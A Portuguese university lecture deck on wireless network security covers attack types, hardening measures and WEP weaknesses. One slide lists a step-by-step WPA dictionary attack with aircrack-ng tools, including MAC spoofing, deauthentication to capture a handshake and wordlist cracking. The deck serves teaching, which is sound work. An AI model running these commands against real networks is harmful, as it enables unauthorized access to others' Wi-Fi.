Você está na página 1de 28

Segurana em Redes Sem Fio

Prof. Ms. Fbio Henrique Cabrini

Agenda
Contedo

Tipos de Ataques Invasores Segurana hardware Segurana software Ferramentas WEP Fases de um ataque Tecnologias WPA2

Como eles fazem?

The quieter you become, the more you are able to hear "Richard Alpert"

Ataques passivos: Eavesdropping (Bisbilhotar) Anlise de trfego Ataques ativos: Masquerade (Disfarce) Replay Modificao da Mensagem DoS (Denial of Service)

Tipos de ataques

War driving War chalking

Os invasores

Como proteger algo que no podemos confinar? H maneiras de proteger o acesso fsico aos equipamentos de conectividade?

Segurana fsica

Alterar configurao default Trocar senhas Escolher corretamente os parmetros e chaves de criptografia Controlar a funo de reset Trocar o SSID e desabilitar seu anncio via broadcast * Alterar parmetros de SNMP padro Atualizaes no software do PA e patches de segurana.

Segurana em nvel de software

Senhas mais complexas Sistema de Deteco de Intrusos (Intrusion Detection System - IDS) Baseado no host Baseado na rede (hardware) Firewalls personalizados Gerenciamento pelo usurio Gerenciamento centralizado

Segurana no cliente

Auditorias temporrias Procurar falhas Procurar rogue APs Medir rea de cobertura Utilizao de Analizadores de rede Posicionamento dos Access Point

Segurana do site

Smart Cards Servidor de Autenticao VPN (Virtual Private Networks) Dados que trafegam no tnel VPN so criptografados e isolados dos demais trfegos Impresso digital Palma da mo Reconhecimento por retina e ris Face Voz

Segurana no acesso

Cisco Location Manager

Inssider

CommView

Back Track

WEP

Baseada no algoritmo RC4 (Rons code 4), que um key stream cipher simtrico Como funciona um stream cipher? O tamanho do key stream se adequa ao tamanho do quadro a ser cifrado

WEP

Caracterstica principal de um stream cipher:


O mesmo texto de entrada gera sempre o mesmo texto cifrado: Conhecido como modo ECB (Electronic Code Book) Maior vulnerabilidade a ataques crackers

Duas alternativas so implementadas para superar esse problema:


Vetor de inicializao (Initialization Vector - IV) Modos de Realimentao (Feedback Modes)

WEP

Vetor de Inicializao:
Vetor de 24 bits Aumenta a chave WEP para 64 bits ou para 128 bits, dependendo do tamanho utilizado anteriormente (40 ou 104 bits efetivos) O vetor enviado no cabealho do quadro, no codificado

WEP

Modos de Realimentao (Feedback Modes)


O modo mais comum utilizado o modo cipher block chaining (CBC) Utiliza o texto cifrado para as prximas codificaes

WEP
Autenticao com chave compartilhada: O Cliente configura uma chave WEP esttica Passos de autenticao: 1) Cliente manda pedido de autenticao com chave compartilhada 2) PA responde com um challenge text 3) O Cliente codifica o challenge text com a chave WEP e envia ao PA 4) O PA decodifica o challenge text e compara com o original, permitindo ou negando a autenticao

WEP
WEP: Texto xor Chave = CFTexto CFTexto xor Texto = Texto xor Chave xor Texto = Chave Vulnervel a ataques do tipo man-in-the-middle

WEP
Mudana de bits

WEP
Mudana de bits Etapas 1) O invasor fareja um quadro na WLAN 2) Substitui alguns bits no corpo do quadro 3) Altera o ICV 4) Transmite o quadro modificado 5) O receptor recebe o quadro e calcula o ICV 6) Compara com o ICV do quadro 7) Aceita o quadro 8) Desencapsula o quadro e processa o pacote IP 9) Gera um erro previsvel 10) O invasor fareja a rede procurando pelo erro previsvel codificado 11) Faz um xor com o erro no codificado 12) Obtem a chave WEP

Vdeo Roteiro

WPA Ataque por dicionrio


Step 1 airmon-ng Step 2 macchanger - - mac 00:11:22:33:44:55 interface Step 3 Airmon-ng start interface Step 4 Airodump-ng interface (mon0) Step 5 Airodump-ng -c channel w file - - bssid mac ap interface Step 6 (another console) Aireplay-ng -0 5 a mac ap h mac interface Step 7 Aircrack-ng file.cap (aguardar um handshake) Step 8 Aircrack-ng w worddic file.cap

Segurana em Redes Sem fio

MAC ACL

Tecnologias

Advanced Encryption Standard

EAP Extensible Authentication Protocol

SSID

WEP RC4

WPA PSK

WPA2 Personal

WPA2 Enterprise

Service Set Identifier

Wired Equivalent Privacy

Wi-Fi Protected Access Pre Shared Key

Temporal Key Integrity Protocol

IEEE802.11i
IEEE802.1x

A u t e n t i c a o

Muitas???

Perguntas?

Prof. Ms. Fbio Cabrini fabio.cabrini@gmail.com

Você também pode gostar